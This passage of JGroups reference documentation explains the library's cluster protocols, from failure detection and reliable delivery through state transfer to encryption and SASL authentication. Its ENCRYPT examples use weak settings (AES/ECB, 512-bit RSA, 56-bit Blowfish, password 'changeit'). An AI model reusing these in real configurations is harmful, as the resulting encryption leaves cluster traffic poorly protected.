* Every member broadcasts a heartbeat every 3 seconds. When received, the sender's timestamp in the table
  is set to the current time
* Every member also checks every 2 seconds if any member's timestamp exceeds the timeout and suspects
  that member if this is the case
* Now C and D crash at the same time
* After roughly 12-13 seconds, `A`, `B` and `E` broadcast a `SUSPECT(C,D)` message
* The coordinator (`A`) uses `VERIFY_SUSPECT` to double check if `C` and `D` are dead
* `A` creates a new view `{A,B,E}` which excludes `C` and `D`

NOTE: Contrary to `FD` which suspects adjacent crashed members `C` and `D` one by one, `FD_ALL` suspects `C` and `D` in
constant time. `FD` takes `N` * (`timeout` * `max_tries`) ms, whereas `FD_ALL` takes `timeout` ms

${FD_ALL}


[[FD_ALL2]]
==== FD_ALL2

Similar to `FD_ALL`, but doesn't use any timestamps. Instead, a boolean flag is associated with each
member. When a message or heartbeat (sent every `interval` ms) from P is received, P's flag is set to true.
The heartbeat checker checks every `timeout` ms for members whose flag is false, suspects those, and
- when done - resets all flags to false again.
The time it takes to suspect a member is the same as for `FD_ALL`.

${FD_ALL2}


[[FD_SOCK]]
==== FD_SOCK

Failure detection protocol based on a ring of TCP sockets created between cluster members, similar to `FD` but
not using heartbeat messages.

Each member in a cluster connects to its neighbor (the last member connects to the first), thus forming a ring.
Member `B` is suspected when its neighbor `A` detects abnormal closing of its TCP socket
(presumably due to a crash of `B`).
However, if `B` is about to leave gracefully, it lets its neighbor `A`
know, so that `A` doesn't suspect `B`.

===== Example
* The membership is `{A,B,C,D,E}`.
* Members `C` and `D` are killed at the same time
* `B` notices that `C` abnormally closed its TCP socket and broadcasts a `SUSPECT(C)` message
* The current coordinator (`A`) asks `VERIFY_SUSPECT` to double check that `C` is dead
* Meanwhile, `B` tries to create a TCP socket to the next-in-line (`D`) but fails. It therefore broadcasts a
  `SUSPECT(D)` message
* `A` also handles this message and asks `VERIFY_SUSPECT` to double check if `D` is dead
* After `VERIFY_SUSPECT` can't verify that `C` and `D` are still alive, `A` creates a new view
  `{A,B,E}` and installs it
* The time taken for `FD_SOCK` to suspect a member is very small (a few ms)

NOTE: It is recommended to use `FD_SOCK` and `FD` or `FD_ALL` together in the same stack: `FD_SOCK` detects killed
nodes immediately, and `FD_ALL` (with a higher timeout) detects hung members or kernel panics / crashed switches
(which don't close the TCP connection) after the timeout.

${FD_SOCK}


[[FD_HOST]]
==== FD_HOST

To detect the crash or freeze of entire hosts and all of the cluster members running on them, `FD_HOST`
can be used. It is not meant to be used in isolation, as it doesn't detect crashed members on the
local host, but in conjunction with other failure detection protocols, such as `FD_ALL` or `FD_SOCK`.

`FD_HOST` can be used when we have multiple cluster members running on a physical box. For example,
if we have members `{A,B,C,D}` running on host 1 and `{M,N,O,P}` running on host 2, and host 1 is
powered down, then `A`, `B`, `C` and `D` are suspected and removed from the cluster together, typically
in one view change.

By default, `FD_HOST` uses `InetAddress.isReachable()` to perform liveness checking of other hosts, but
if property `cmd` is set, then any script or command can be used. `FD_HOST` will launch the command and
pass the IP address of the host to be checked as an argument. Example: `cmd="ping -c 3"`.

A typical failure detection configuration would look like this:

[source,xml]
----
...
<FD_SOCK/>
<FD_ALL timeout="60000" interval="20000"/>
<FD_HOST interval="10000" timeout="35000" />
...
----

If we have members `{A,B,C}` on host `192.168.1.3`, `{M,N,O}` on `192.168.1.4` and `{X,Y,Z}` on `192.168.1.5`, then
the behavior is as follows:

.Failure detection behavior
[options="header"]
|===============
|Scenario|Behavior
|Any member (say `O`) crashes|
`FD_SOCK` detects this immediately (as the TCP socket was closed). `O` is suspected and removed

|Member `Y` hangs|
`FD_ALL` starts missing heartbeats from `Y` (note that host `192.168.1.5` is up) and suspects
`Y` after 60 seconds. `Y` is removed from the view.

|Host `192.168.1.3` is shut down (`shutdown -h now`)|
Since this is a graceful shutdown, the OS closes all sockets.
`FD_SOCK` therefore\n suspects `A`, `B` and `C` and removes them from the view immediately.\n \n|The power supply to host `192.168.1.3` is cut, or `192.168.1.3` panicked|\n `FD_HOST` detects that `192.168.1.3` is not alive and suspects `A`, `B` and `C` after ~35 to 45s.\n \n|Member `N` leaves|\n Since this is a graceful leave, none of the failure detection protocols kicks in\n \n\n|===============\n\n\n${FD_HOST}\n\n\n\n==== VERIFY_SUSPECT\n\nVerifies that a suspected member is really dead by pinging that member one last time before excluding it,\n and dropping the suspect message if the member does respond.\n \n\nVERIFY_SUSPECT tries to minimize false suspicions.\n \n\nThe protocol works as follows: it catches SUSPECT events traveling up the stack.\n Then it verifies that the suspected member is really dead. If yes, it passes the SUSPECT event up the\n stack, otherwise it discards it. VERIFY_SUSPECT has to be placed somewhere above the failure detection\n protocol and below the GMS protocol (the receiver of the SUSPECT event). Note that SUSPECT events may be\n reordered by this protocol.\n \n\n${VERIFY_SUSPECT}\n\n\n\n[[ReliableMessageTransmission]]\n\n\n=== Reliable message transmission\n\n[[NAKACK]]\n\n\n==== pbcast.NAKACK\n\nNAKACK provides reliable delivery and FIFO (= First In First Out) properties for messages sent to all\n nodes in a cluster.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\nnumbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\na message if that sequence number is not received.\n\nNOTE: NAKACK can also be configured to send retransmission requests for M to _anyone_ in the cluster,\n rather than only to the sender of M.\n\n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nNAKACK thus provides lossless and FIFO delivery of multicast messages, using negative acks. E.g. when\n receiving P:1, P:3, P:4, a receiver delivers only P:1, and asks P for retransmission of message 2,\n queuing P:3-4. When P:2 is finally received, the receiver will deliver P:2-4 to the application.\n \n\n${NAKACK}\n\n[[NAKACK2]]\n\n\n==== NAKACK2\n\nNAKACK2 was introduced in 3.1 and is a successor to NAKACK (at some point it will replace NAKACK).
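\n\nAs noted below, switching is usually just a matter of changing the protocol name in the stack configuration, e.g. (a sketch; the `xmit_interval` value is purely illustrative):\n\n[source,xml]\n----\n<!-- before: <pbcast.NAKACK\/> -->\n<pbcast.NAKACK2 xmit_interval=\"500\"\/>\n----\n\n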
NAKACK2 has the same properties as NAKACK, but its implementation is faster and uses less memory, plus it\n creates fewer tasks in the timer.\n \n\nSome of the properties of NAKACK were deprecated in NAKACK2, but were not removed, so people can simply\n change from NAKACK to NAKACK2 by changing the protocol name in the config.\n \n\n${NAKACK2}\n\n[[UNICAST]]\n\n\n==== UNICAST\n\nUNICAST provides reliable delivery and FIFO (= First In First Out) properties for point-to-point\n messages between one sender and one receiver.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\n numbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\n a message if that sequence number is not received.\n \n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nUNICAST uses _positive acks_ for retransmission; sender A keeps sending\n message M until receiver B delivers M and sends an ack(M) to A, or until B leaves the cluster or A\n crashes.\n \n\nAlthough JGroups attempts to send acks selectively, UNICAST will still see a lot of acks on the wire.\n If this is not desired, use UNICAST2 (see <<UNICAST2>>).\n \n\nOn top of a reliable transport, such as TCP, UNICAST is not really needed. However, concurrent\n delivery of messages from the same sender is prevented by UNICAST by acquiring a lock on the sender's\n retransmission table, so unless concurrent delivery is desired, UNICAST should not be removed from\n the stack even if TCP is used.\n \n\n${UNICAST}\n\n[[UNICAST2]]\n\n\n==== UNICAST2\n\nUNICAST2 provides lossless, ordered communication between 2 members. Contrary to UNICAST, it\n uses _negative acks_ (similar to NAKACK) rather than positive acks. This reduces the communication\n overhead required for sending an ack for every message.\n \n\nWith negative acks, sender A simply sends messages without waiting for acks, and receivers never ack\n messages until they detect a gap: for instance, if A sends messages 1,2,4,5, then B delivers 1 and 2,\n but queues 4 and 5 because it is missing message 3 from A. B then asks A to retransmit 3. When 3 is\n received, messages 3, 4 and 5 can be delivered to the application.\n \n\nCompared to a positive ack scheme as used in UNICAST, negative acks have the advantage that they generate\n less traffic: if all messages are received in order, we never need to do any retransmission.\n \n\n${UNICAST2}\n\n[[UNICAST3]]\n\n\n==== UNICAST3\n\nUNICAST3 (available in 3.3) is the successor to UNICAST2, but is based on UNICAST, as it uses a\n positive acknowledgment mechanism. However, speed-wise it is similar to UNICAST2.\n \n\nDetails of UNICAST3's design can be found here:\n link:$$https:\/\/github.com\/belaban\/JGroups\/blob\/master\/doc\/design\/UNICAST3.txt$$[UNICAST3]\n \n\n${UNICAST3}\n\n[[RSVP]]\n\n\n==== RSVP\n\nThe RSVP protocol is not a reliable delivery protocol per se, but augments reliable protocols such\n as NAKACK, UNICAST or UNICAST2. It should be placed somewhere _above_ these in\n the stack.\n \n\n${RSVP}\n\n[[STABLE]]\n\n\n=== Message stability\n\nTo serve potential retransmission requests, a member has to store received messages until it is known\n that every member in the cluster has received them.
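\n\nAs a rough, made-up illustration of the mechanism described in the following paragraphs: each member reports the highest sequence numbers it has seen per sender, and the element-wise minimum over all reports marks what has been seen by everyone:\n\n----\nA reports: A:25 B:30 C:27\nB reports: A:24 B:30 C:28\nC reports: A:25 B:29 C:28\nminimum : A:24 B:29 C:27 <- safe to garbage collect up to these seqnos\n----\n\n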
Message stability for a given message M means that M\n has been seen by everyone in the cluster.\n \n\nThe stability protocol periodically (or when a certain number of bytes have been received) initiates a\n consensus protocol, which multicasts a stable message containing the highest message numbers for a\n given member. This is called a digest.\n \n\nWhen everyone has received everybody else's stable messages, a digest is computed which consists of the\n minimum sequence numbers of all received digests so far. This is the stability vector, and it contains only\n message sequence numbers that have been seen by everyone.\n \n\nThis stability vector is then broadcast to the group, and everyone can remove messages from their\n retransmission tables whose sequence numbers are smaller than the ones received in the stability vector.\n These messages can then be garbage collected.\n \n\n\n\n==== STABLE\n\nSTABLE garbage collects messages that have been seen by all members of a cluster. Each member has to\n store all messages because it may be asked to retransmit. Only when we are sure that all members have\n seen a message can it be removed from the retransmission buffers. STABLE periodically gossips its\n highest and lowest messages seen. The lowest value is used to compute the min (all lowest seqnos\n for all members), and messages with a seqno below that min can safely be discarded.\n \n\nNote that STABLE can also be configured to run when N bytes have been received. This is recommended\n when sending messages at a high rate, because sending stable messages based on time might accumulate\n messages faster than STABLE can garbage collect them.\n \n\n${STABLE}\n\n[[GMS]]\n\n\n=== Group Membership\n\nGroup membership takes care of joining new members, handling leave\n requests by existing members, and handling SUSPECT messages for crashed\n members, as emitted by failure detection protocols. The algorithm for\n joining a new member is essentially:\n \n\n\n----\n\n- loop\n- find initial members (discovery)\n- if no responses:\n - become singleton group and break out of the loop\n- else:\n - determine the coordinator (oldest member) from the responses\n - send JOIN request to coordinator\n - wait for JOIN response\n - if JOIN response received:\n - install view and break out of the loop\n - else\n - sleep for 5 seconds and continue the loop\n \n----\n\n\n\n==== pbcast.GMS\n\n${GMS}\n\n\n\n===== Joining a new member\n\nConsider the following situation: a new member wants to join a\n group. The procedure to do so is:\n \n\n* Multicast an (unreliable) discovery request (ping)\n* Wait for n responses or m milliseconds (whichever comes first)\n* Every member responds with the address of the coordinator\n* If the initial responses are > 0: determine the coordinator and start the JOIN protocol\n* If the initial responses are 0: become coordinator, assuming that no one else is out there\n\nHowever, the problem is that the initial mcast discovery request\nmight get lost, e.g. when multiple members start at the same time, the\noutgoing network buffer might overflow, and the mcast packet might get\ndropped. Nobody receives it and thus the sender will not receive any\nresponses, resulting in an initial membership of 0. This could result in\nmultiple coordinators, and multiple subgroups forming. How can we overcome\nthis problem? There are two solutions:\n\n. Increase the timeout, or the number of responses received. This will\n only help if the reason for the empty membership was a slow host.
If\n the mcast packet was dropped, this solution won't help\n. Add the MERGE2 or MERGE3 protocol. This doesn't actually prevent\n multiple initial coordinators, but rectifies the problem by merging\n different subgroups back into one. Note that this might involve state\n merging, which needs to be done by the application.\n \n\n\n[[FlowControl]]\n=== Flow control\n\nFlow control takes care of adjusting the rate of a message sender to the rate of the slowest receiver over time.\n If a sender continuously sends messages at a rate that is faster than the receiver(s), the receivers will\n either queue up messages, or the messages will get discarded by the receiver(s), triggering costly\n retransmissions. In addition, there is spurious traffic on the cluster, causing even more retransmissions.\n \n\nFlow control throttles the sender so the receivers are not overrun with messages.\n \n\nNote that flow control can be bypassed by setting message flag Message.NO_FC. See <<MessageFlags>>\n for details.\n \n\nThe properties for FlowControl are shown below and can be used in\n MFC and UFC:\n \n\n${FlowControl}\n\n\n\n==== FC\n\nFC uses a credit-based system, where each sender has +$$max_credits$$+ credits and decrements\n them whenever a message is sent. The sender blocks when the credits fall below 0, and only resumes\n sending messages when it receives a replenishment message from the receivers.\n \n\nThe receivers maintain a table of credits for all senders and decrement the given sender's credits\n as well, when a message is received.\n \n\nWhen a sender's credits drop below a threshold, the receiver will send a replenishment message to\n the sender. The threshold is defined by +$$min_bytes$$+ or +$$min_threshold$$+.\n \n\n${FC}\n\n\nNOTE: FC has been deprecated, use MFC and UFC instead.\n\n\n==== MFC and UFC\n\nIn 2.10, FC was separated into MFC (Multicast Flow Control) and UFC (Unicast Flow Control). The reason\n was that multicast flow control should not be impeded by unicast flow control, and vice versa. Also,\n performance for the separate implementations could be increased, plus they can be individually omitted.\n For example, if no unicast flow control is needed, UFC can be left out of the stack configuration.\n \n\n[[MFC]]\n\n\n===== MFC\n\nMFC currently has no properties other than those inherited from\n FlowControl (see above).\n \n\n${MFC}\n\n[[UFC]]\n\n\n===== UFC\n\nUFC currently has no properties other than those inherited from\n FlowControl (see above).\n \n\n${UFC}\n\n\n\n=== Fragmentation\n\n\n\n==== FRAG and FRAG2\n\nFRAG and FRAG2 fragment large messages into smaller ones, send the smaller ones, and at the receiver\n side, the smaller fragments will get assembled into larger messages again, and delivered to the\n application. FRAG and FRAG2 work for both unicast and multicast messages.\n \n\nThe difference between FRAG and FRAG2 is that FRAG2 does one less copy than FRAG, so it is the recommended\n fragmentation protocol. FRAG serializes a message to know the exact size required (including headers),\n whereas FRAG2 only fragments the payload (excluding the headers), so it is faster.\n \n\nThe properties of FRAG2 are:\n \n\n${FRAG2}\n\nContrary to FRAG, FRAG2 does not need to serialize a message in order to break it into smaller\n fragments: it looks only at the message's buffer, which is a byte array anyway.
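\n\nConfiguration-wise, a typical stack sets only the fragmentation size, e.g. (a sketch; the value is illustrative and should stay below the maximum size the transport can send in one packet):\n\n[source,xml]\n----\n<FRAG2 frag_size=\"60K\"\/>\n----\n\n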
FRAG2 assumes that the\n size addition for headers and src and dest addresses is minimal when the transport finally has to\n serialize the message, so it adds a constant (by default 200 bytes). Because of the efficiency gained by\n not having to serialize the message just to determine its size, FRAG2 is generally recommended over FRAG.\n \n\n\n\n=== Ordering\n\n[[SEQUENCER]]\n\n\n==== SEQUENCER\n\nSEQUENCER provides total order for multicast (=group) messages by forwarding messages to the current\n coordinator, which then sends the messages to the cluster on behalf of the original sender. Because it\n is always the same sender (whose messages are delivered in FIFO order), a global (or total) order\n is established.\n \n\nSending members add every forwarded message M to a buffer and remove M when they receive it. Should\n the current coordinator crash, all buffered messages are forwarded to the new coordinator.\n \n\n${SEQUENCER}\n\n[[TOA]]\n\n\n==== Total Order Anycast (TOA)\n\nA total order anycast is a totally ordered message sent to a subset of the cluster members. TOA\n intercepts messages with an AnycastMessage (carrying a list of addresses) and handles sending of the\n message in total order. Say the cluster is {A,B,C,D,E} and the Anycast is to {B,C}.\n \n\nSkeen's algorithm is used to send the message: B and C each maintain a logical clock (a counter).\n When a message is to be sent, TOA contacts B and C and asks them for their counters. B and C return\n their counters (incrementing them for the next request).\n \n\nThe originator of the message then sets the message's ID to be the max of all returned counters and\n sends the message. Receivers then deliver the messages in order of their IDs.\n \n\nThe main use of TOA is currently in Infinispan's transactional caches with partial replication: it\n is used to apply transactional modifications in total order, so that no two-phase commit protocol\n has to be run and no locks have to be acquired.\n \n\nAs shown in link:$$http:\/\/www.cloudtm.eu\/home\/Publications$$[ \"Exploiting Total Order Multicast in Weakly Consistent Transactional Caches\"], when we have\n many conflicts caused by different transactions modifying the same keys, TOM fares better than 2PC.\n \n\nNote that TOA is experimental (as of 3.1).\n \n\n${tom.TOA}\n\n[[StateTransferProtocolDetails]]\n\n\n=== State Transfer\n\n[[pbcast.STATE_TRANSFER]]\n\n\n==== pbcast.STATE_TRANSFER\n\nSTATE_TRANSFER is the existing state transfer protocol, which transfers byte[] buffers around. However, at the\n state provider's side, JGroups creates an output stream over the byte[] buffer, and passes the\n output stream to the getState(OutputStream) callback, and at the state\n requester's side, an input stream is created and passed to the\n setState(InputStream) callback.\n \n\nThis allows us to continue using STATE_TRANSFER until the new state transfer protocols\n replace it (perhaps in 4.0).\n \n\nIn order to transfer application state to a joining member of a cluster, STATE_TRANSFER has to load\n the entire state into memory and send it to the joining member. The major limitation of this approach is that\n very large state transfers would likely result in memory exhaustion.\n \n\nFor large state transfers, use either the STATE or STATE_SOCK protocol.
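\n\nSwitching again only requires exchanging the protocol element in the stack, e.g. (a sketch):\n\n[source,xml]\n----\n<!-- instead of <pbcast.STATE_TRANSFER\/> -->\n<pbcast.STATE\/>\n----\n\n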
If the state is small, however,\n STATE_TRANSFER is okay.\n \n\n${STATE_TRANSFER}\n\n[[StreamingStateTransfer]]\n\n\n==== StreamingStateTransfer\n\nStreamingStateTransfer is the superclass of STATE and STATE_SOCK (see below).\n Its properties are:\n \n\n${StreamingStateTransfer}\n\n[[pbcast.STATE]]\n\n\n==== pbcast.STATE\n\n\n\n===== Overview\n\nSTATE was renamed from (2.x) STREAMING_STATE_TRANSFER, and refactored to extend a common superclass\n StreamingStateTransfer. The other state transfer protocol extending\n StreamingStateTransfer is STATE_SOCK (see <<STATE_SOCK>>).\n \n\nSTATE uses a _streaming approach_ to state transfer; the\n state provider writes its state to the output stream passed to it in the\n getState(OutputStream) callback, and the stream chunks the data up into pieces\n that are sent to the state requester in separate messages.\n \n\nThe state requester receives those chunks and feeds them into the input stream from which the\n state is read by the setState(InputStream) callback.\n \n\nThe advantage compared to STATE_TRANSFER is that state provider and requester only need small\n (transfer) buffers to keep a part of the state in memory, whereas STATE_TRANSFER needs to copy\n the _entire_ state into memory.\n \n\nIf we for example have a list of 1 million elements, then STATE_TRANSFER would have to create a\n byte[] buffer out of it, and return the byte[] buffer, whereas a streaming approach could iterate\n through the list and write each list element to the output stream. Whenever the buffer capacity is\n reached, we'd then send a message and the buffer would be reused for more data.\n \n\n\n\n===== Configuration\n\nSTATE currently has no properties other than those inherited from\n StreamingStateTransfer (see above).\n \n\n[[pbcast.STATE_SOCK]]\n\n\n==== STATE_SOCK\n\nSTATE_SOCK is also a streaming state transfer protocol, but compared to STATE, it doesn't send the chunks\n as messages, but uses a TCP socket connection between state provider and requester to transfer the state.\n \n\nThe state provider creates a server socket at a configurable bind address and port, and the address\n and port are sent back to a state requester in the state response. The state requester then establishes\n a socket connection to the server socket and passes the socket's input stream to the\n setState(InputStream) callback.\n \n\n\n\n===== Configuration\n\nThe configuration options of STATE_SOCK are listed below:\n \n\n${STATE_SOCK}\n\n[[BARRIER]]\n\n\n==== BARRIER\n\nBARRIER is used by some of the state transfer protocols, as it lets existing threads complete and blocks\n new threads, to get both the digest and state in one go.\n \n\nIn 3.1, a new mechanism for state transfer will be implemented, eliminating the need for BARRIER. Until\n then, BARRIER should be used when one of the state transfer protocols is used. BARRIER is\n part of every default stack which contains a state transfer protocol.\n \n\n${BARRIER}\n\n\n\n=== pbcast.FLUSH\n\nFlushing forces group members to send all their pending messages\n prior to a certain event. The process of flushing acquiesces the\n cluster so that state transfer or a join can be done. It is also\n called the stop-the-world model, as nobody will be able to send\n messages while a flush is in process. Flush is used in:\n \n\n\nState transfer:: When a member requests state transfer, it tells everyone to\n stop sending messages and waits for everyone's ack.
When it has received everyone's acks,\n the application asks the coordinator for its state, and it is shipped back to the\n requester. After the requester has received and set the state\n successfully, the requester tells everyone to resume sending messages.\nView changes (e.g. a join):: Before installing a new view\n V2, flushing ensures that all messages _sent_ in the\n current view V1 are indeed _delivered_ in V1, rather than in V2\n (in all non-faulty members). This is essentially Virtual Synchrony.\n \n\n\n \n \n\nFLUSH is designed as another protocol positioned just below the\n channel, on top of the stack (e.g. above STATE_TRANSFER). The STATE_TRANSFER and GMS\n protocols request a flush by sending an event up the stack, where\n it is handled by the FLUSH protocol. Another event is sent back by\n the FLUSH protocol to let the caller know that the flush has completed.\n When done (e.g. view was installed or state transferred), the protocol\n sends a message, which will allow everyone in the cluster to resume sending.\n \n\nA channel is notified that the FLUSH phase has been started by\n the Receiver.block() callback. \n \n\nRead more about flushing in <<Flushing>>.\n \n\n${FLUSH}\n\n[[Misc]]\n\n\n=== Misc\n\n[[STATS]]\n\n\n==== Statistics\n\nSTATS exposes various statistics, e.g. the number of received multicast and unicast messages, the number of\n bytes sent, etc. It should be placed directly over the transport.\n \n\n${STATS}\n\n[[Security]]\n\n\n==== Security\n\nJGroups provides protocols to encrypt cluster traffic (ENCRYPT), and to make sure that only\n authorized members can join a cluster (AUTH and SASL).\n \n\n[[ENCRYPT]]\n\n\n===== ENCRYPT\n\nA detailed description of ENCRYPT is found in the JGroups source (__JGroups\/doc\/ENCRYPT.html__).\nEncryption by default only encrypts the message body, but doesn't encrypt message headers.\nTo encrypt the entire message (including all headers, plus destination and source addresses),\nthe property ++$$encrypt_entire_message$$++ has to be set to true.\nAlso, ENCRYPT has to be below any protocols whose headers we want to encrypt, e.g.\n\n\n[source,xml]\n----\n<config ... >\n <UDP \/>\n <PING \/>\n <MERGE2 \/>\n <FD \/>\n <VERIFY_SUSPECT \/>\n <pbcast.NAKACK \/>\n <UNICAST \/>\n <pbcast.STABLE \/>\n <FRAG2 \/>\n <pbcast.GMS \/>\n <ENCRYPT encrypt_entire_message=\"false\"\n sym_init=\"128\" sym_algorithm=\"AES\/ECB\/PKCS5Padding\"\n asym_init=\"512\" asym_algorithm=\"RSA\"\/>\n<\/config>\n----\n\nNote that ENCRYPT sits below NAKACK and UNICAST, so the sequence numbers for these 2 protocols will\n be encrypted. Had ENCRYPT been placed below UNICAST but above NAKACK, then only UNICAST's headers\n (including sequence numbers) would have been encrypted, but not NAKACK's.\n \n\nNote that it doesn't make too much sense to place ENCRYPT even lower in the stack, because then\n almost all traffic (even merge or discovery traffic) will be encrypted, which may be somewhat of\n a performance drag.\n \n\nWhen we encrypt an entire message, we have to marshal the message into a byte buffer first and\n then encrypt it.
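\n\nEnabling this is a single attribute change to the earlier example (a sketch reusing the same illustrative attributes):\n\n[source,xml]\n----\n<ENCRYPT encrypt_entire_message=\"true\"\n sym_init=\"128\" sym_algorithm=\"AES\/ECB\/PKCS5Padding\"\n asym_init=\"512\" asym_algorithm=\"RSA\"\/>\n----\n\n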
The resulting marshalling and copying of the byte buffer is not so good\n performance-wise...\n \n\n\n\n.Using a key store\nENCRYPT uses store type JCEKS (for the differences between JKS and JCEKS, see the JDK security documentation), however\n +keytool+ uses JKS by default, therefore a keystore generated with keytool will not be accessible.\n \n\nTo generate a keystore compatible with JCEKS, use the following command-line options to keytool:\n \n\n\n----\n\nkeytool -genseckey -alias myKey -keypass changeit -storepass changeit -keyalg Blowfish -keysize 56 -keystore defaultStore.keystore -storetype JCEKS\n \n----\n\nENCRYPT could then be configured as follows:\n \n\n\n[source,xml]\n----\n\n<ENCRYPT key_store_name=\"defaultStore.keystore\"\n store_password=\"changeit\"\n alias=\"myKey\"\/>\n \n----\n\nNote that defaultStore.keystore will have to be found in the classpath.\n \n\n\nNOTE: If asymmetric encryption is used (no shared key via keystore), ENCRYPT has to be placed somewhere _above_ GMS,\n or else the JOIN process would not function (as the JOIN response would get dropped).\n\n${ENCRYPT}\n\n[[AUTH]]\n\n\n===== AUTH\n\nAUTH is used to provide a layer of authentication to JGroups. This allows you to define pluggable\n security that defines whether a node should be allowed to join a cluster. AUTH sits below the GMS\n protocol and listens for JOIN REQUEST messages. When a JOIN REQUEST is received, it tries to find\n an AuthHeader object, inside of which should be an implementation of the AuthToken object.\n \n\nAuthToken is an abstract class, implementations of which are responsible for providing the\n actual authentication mechanism. Some basic implementations of AuthToken are provided in the\n org.jgroups.auth package (SimpleToken, MD5Token and X509Token). Effectively, all these implementations\n do is encrypt a string (found in the jgroups config) and pass that along with the JOIN REQUEST.\n \n\nWhen authentication is successful, the message is simply passed up the stack to the GMS protocol.\n When it fails, the AUTH protocol creates a JOIN RESPONSE message with a failure string and passes\n it back down the stack. This failure string informs the client of the reason for failure.\n Clients will then fail to join the group and will throw a SecurityException.\n If this error string is null then authentication is considered to have passed.\n \n\nFor more information refer to the wiki at http:\/\/community.jboss.org\/wiki\/JGroupsAUTH[AUTH].\n \n\n${AUTH}\n\n[[SASL]]\n\n\n===== SASL\n\nSASL is an alternative to the AUTH protocol which provides a layer of authentication to JGroups by allowing the\n use of one of the SASL mechanisms made available by the JDK. SASL sits below the GMS\n protocol and listens for JOIN \/ MERGE REQUEST messages. When a JOIN \/ MERGE REQUEST is received, it tries to find\n a SaslHeader object which contains the initial response required by the chosen SASL mech. This initiates a sequence\n of challenge\/response messages which, if successful, culminates in allowing the new node to join the cluster. The actual\n validation logic required by the SASL mech must be provided by the user in the form of a standard javax.security.auth.CallbackHandler\n implementation.\n \n\nWhen authentication is successful, the message is simply passed up the stack to the GMS protocol.\n When it fails, the SASL protocol creates a JOIN \/ MERGE RESPONSE message with a failure string and passes\n it back down the stack.
This failure string informs the client of the reason for failure.\n Clients will then fail to join the group and will throw a SecurityException.\n If this error string is null then authentication is considered to have passed.\n \n\nSASL can be (minimally) configured as follows:\n \n\n\n[source,xml]\n----\n\n<config ... >\n <UDP \/>\n <PING \/>\n <pbcast.NAKACK \/>\n <UNICAST3 \/>\n <pbcast.STABLE \/>\n <SASL mech=\"DIGEST-MD5\" \n client_callback_handler=\"org.example.ClientCallbackHandler\" \n server_callback_handler=\"org.example.ServerCallbackHandler\"\/>\n <pbcast.GMS \/>\n \n<\/config>\n \n----\n\nThe +mech+ property specifies the SASL mech you want to use, as defined by RFC-4422. You will also need to provide two\n callback handlers, one used when the node is running as coordinator (++$$server_callback_handler$$++) and one used in all other \n cases (++$$client_callback_handler$$++). Refer to the JDK's SASL reference guide for more details: link:$$http:\/\/docs.oracle.com\/javase\/7\/docs\/technotes\/guides\/security\/sasl\/sasl-refguide.html$$[] \n \nThe JGroups package comes with a simple properties-based CallbackHandler which can be used when a more complex Kerberos\/LDAP approach is not needed. To use this, set both the (++$$server_callback_handler$$++) and\n the (++$$client_callback_handler$$++) to org.jgroups.auth.sasl.SimpleAuthorizingCallbackHandler. This CallbackHandler can be configured either programmatically, by passing to the constructor an\n instance of java.util.Properties containing the appropriate properties, or via standard Java system properties (i.e. set on the command-line using the -DpropertyName=propertyValue notation).\n The following properties are available:\n\n* sasl.credentials.properties - the path to a property file which contains principal\/credential mappings represented as principal=password\n* sasl.local.principal - the name of the principal that is used to identify the local node. It must exist in the sasl.credentials.properties file\n* sasl.roles.properties - (optional) the path to a property file which contains principal\/roles mappings represented as principal=role1,role2,role3\n* sasl.role - (optional) if present, authorizes joining nodes only if their principal is in this role\n* sasl.realm - (optional) the name of the realm to use for the SASL mechanisms that require it\n\n${SASL}\n\n[[COMPRESS]]\n\n\n==== COMPRESS\n\nCOMPRESS compresses messages larger than +$$min_size$$+, and uncompresses them at the\n receiver's side. Property +$$compression_level$$+ determines how thorough the\n compression algorithm should be (0: no compression, 9: highest compression).\n \n\n${COMPRESS}\n\n[[SCOPE]]\n\n\n==== SCOPE\n\nAs discussed in <<Scopes>>, the SCOPE protocol is used to deliver updates\n to different scopes concurrently. It has to be placed somewhere above UNICAST and NAKACK.\n \n\nSCOPE has a separate thread pool. The reason why the default thread pool from the transport wasn't used\n is that the default thread pool has a different purpose. For example, it can use a queue to which all\n incoming messages are added, which would defy the purpose of concurrent delivery in SCOPE. As a matter\n of fact, using a queue would most likely delay messages getting sent up into SCOPE!\n \n\nAlso, the default pool's rejection policy might not be \"run\", so the SCOPE implementation would have\n to catch rejection exceptions and engage in a retry protocol, which is complex and wastes resources.\n \n\nThe configuration of the thread pool is shown below.
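\n\nFor orientation, a minimal SCOPE element might look like this (a sketch; the thread pool attributes from the property list below are omitted, and the expiry values are invented and explained further below):\n\n[source,xml]\n----\n<SCOPE expiration_time=\"30000\" expiration_interval=\"60000\"\/>\n----\n\n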
If you expect _concurrent_\n messages to N _different_ scopes, then the max pool size would ideally be set\n to N. However, in most cases, this is not necessary as (a) the messages might not be to different\n scopes or (b) not all N scopes might get messages at the same time. So even if the max pool size is a\n bit smaller, the cost of this is slight delays, in the sense that a message for scope Y might wait until\n the thread processing a message for scope X is available.\n \n\nTo remove unused scopes, an expiry policy is provided: expiration_time is the number of milliseconds\n after which an idle scope is removed. An idle scope is a scope which hasn't seen any messages for\n expiration_time milliseconds. The expiration_interval value defines the number of milliseconds at\n which the expiry task runs. Setting both values to 0 disables expiration; it would then have to be\n done manually (see <<Scopes>> for details).\n \n\n${SCOPE}\n\n[[RELAY]]\n\n\n==== RELAY\n\nRELAY bridges traffic between separate clusters; see <<RelayAdvanced>> for details.\n \n\n${RELAY}\n\n[[RELAY2]]\n\n\n==== RELAY2\n\nRELAY2 provides clustering between different sites (local clusters), for multicast and unicast messages.\n See <<Relay2Advanced>> for details.\n \n\n${RELAY2}\n\n[[STOMP_Protocol]]\n\n\n==== STOMP\n\nSTOMP is discussed in <<STOMP>>. The properties for it are shown below:\n \n\n${STOMP}\n\n[[DAISYCHAIN]]\n\n\n==== DAISYCHAIN\n\nThe DAISYCHAIN protocol is discussed in <<DaisyChaining>>.\n \n\n${DAISYCHAIN}\n\n[[RATE_LIMITER]]\n\n\n==== RATE_LIMITER\n\nRATE_LIMITER can be used to set a limit on the data sent per time unit. When sending data, only\n max_bytes can be sent per time_period milliseconds. E.g. if max_bytes=\"50M\" and time_period=\"1000\", then\n a sender can only send 50MBytes \/ sec max.\n \n\n${RATE_LIMITER}\n\n[[LockingProtocols]]\n==== Locking 